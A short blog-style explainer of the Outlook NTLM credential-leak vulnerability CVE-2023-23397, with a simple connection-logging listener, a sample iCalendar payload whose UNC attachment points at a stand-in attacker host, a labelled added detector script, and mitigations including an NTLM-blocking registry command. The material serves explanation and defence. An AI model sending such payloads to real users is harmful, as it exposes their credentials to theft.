
CVE-2023-23397

Sep 8, 2024 · 3 min read

How CVE-2023-23397 Works

The vulnerability lies in how Microsoft Outlook handles reminders and calendar invites. Normally, Outlook processes these items to display notifications and updates. Here, however, an attacker can craft a message that causes Outlook to open an outbound connection to a server under the attacker's control. That connection is authenticated with NTLM, so the victim's NTLM credentials are sent to the attacker's server and exposed to misuse.

Exploit Scenario

  1. An attacker crafts a malicious email containing a reminder or calendar invite.
  2. The email specifies a UNC (Universal Naming Convention) path that points to an attacker-controlled server.
  3. When Outlook receives and processes this email, it automatically tries to access the specified UNC path, triggering NTLM authentication and sending the victim’s credentials to the attacker.

Code and Example

import http.server
import socketserver

# Minimal HTTP listener that records the address of every client that connects.
# It only sees plain HTTP requests; the UNC path in the payload below is fetched
# over SMB, so this demonstrates connection logging, not the NTLM exchange itself.
class MyRequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # client_address is a (host, port) tuple for the connecting peer
        print(f"Received connection from: {self.client_address}")
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"Hello, you've been logged!")

PORT = 8000
handler = MyRequestHandler
with socketserver.TCPServer(("", PORT), handler) as httpd:
    print(f"Serving on port {PORT}")
    httpd.serve_forever()

Malicious Email Payload Example

BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:123456
SUMMARY:Malicious Reminder
DTSTART;TZID=Europe/London:20231105T090000
ATTACH;VALUE=URI:\\attacker-controlled-server.com\malicious\path
END:VEVENT
END:VCALENDAR
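A defender-side check over the payload format shown above, added here as an example and not part of the original post: it unfolds the iCalendar lines, finds property values carrying a UNC path or file:// URI, and flags any whose host is not on an allow-list of internal servers. The sample message, the allow-list and the host names are constructed for the example.

```python
import re

# Hosts that calendar items may legitimately reference (constructed allow-list).
ALLOWED_HOSTS = {"fileserver.example.local", "intranet.example.local"}

# A UNC path (\\host\share) or a file:// URI; group 1 is the host that would be contacted.
REMOTE_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9._\-]+)(?=[\\/]|$)", re.IGNORECASE)

def unfold(ics: str) -> list[str]:
    """Undo RFC 5545 line folding (a line break followed by a space or tab)."""
    return [ln for ln in re.sub(r"\r?\n[ \t]", "", ics).splitlines() if ln.strip()]

def find_remote_references(ics: str, allowed_hosts) -> list[dict[str, str]]:
    """Return every property whose value would make the client contact a host outside the allow-list."""
    allowed = {h.lower() for h in allowed_hosts}
    findings: list[dict[str, str]] = []
    uid = ""
    for line in unfold(ics):
        head, sep, value = line.partition(":")
        if not sep:
            continue
        name = head.split(";", 1)[0].upper()  # property name without its parameters
        if name == "UID":
            uid = value.strip()  # reported with findings that follow it in the same VEVENT
        elif name == "END" and value.strip().upper() == "VEVENT":
            uid = ""
        for match in REMOTE_RE.finditer(value):
            host = match.group(1).lower()
            if host not in allowed:
                findings.append({"uid": uid, "property": name, "host": host, "value": value})
    return findings

# Constructed sample: two benign attachments, then a folded line carrying a UNC path to an outside host.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:123456\r\n"
    "ATTACH;VALUE=URI:https://intranet.example.local/agenda.pdf\r\n"
    "ATTACH;VALUE=URI:\\\\fileserver.example.local\\shares\\agenda.docx\r\n"
    "ATTACH;VALUE=URI:\\\\attacker-controlled-serv\r\n"
    " er.com\\malicious\\path\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

if __name__ == "__main__":
    for hit in find_remote_references(SAMPLE_ICS, ALLOWED_HOSTS):
        print(f"UID {hit['uid']}: {hit['property']} points at untrusted host {hit['host']}")
```

The same check can be run over calendar items exported from a mail gateway; an https URL is not flagged because a browser fetch does not trigger the implicit NTLM handshake that a UNC path does.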

Impact and Risks

Mitigation Strategies

  1. Update Microsoft Outlook: Microsoft has released patches for this vulnerability. Ensure that all systems are updated to the latest version of Outlook.
  2. Disable SMB Outbound Traffic: Blocking outbound SMB traffic at the network perimeter can prevent credentials from being sent to an external server.
  3. Use Protected Users Group: Members of this Active Directory group cannot authenticate with NTLM at all, so their credentials are never sent in this way.
  4. Implement NTLM Blocking Policies: Where possible, configure policies to restrict NTLM authentication and enforce Kerberos.

Defensive Example in PowerShell

# RestrictSendingNTLMTraffic: 0 = Allow all, 1 = Audit all, 2 = Deny all outgoing NTLM traffic to remote servers
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" -Name "RestrictSendingNTLMTraffic" -Value 2 -Type DWord

This command sets the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy to Deny all, so the machine no longer sends NTLM credentials to remote servers, significantly reducing the risk of credential theft. Running it with the audit value (1) first shows which existing connections would break before enforcing the restriction.
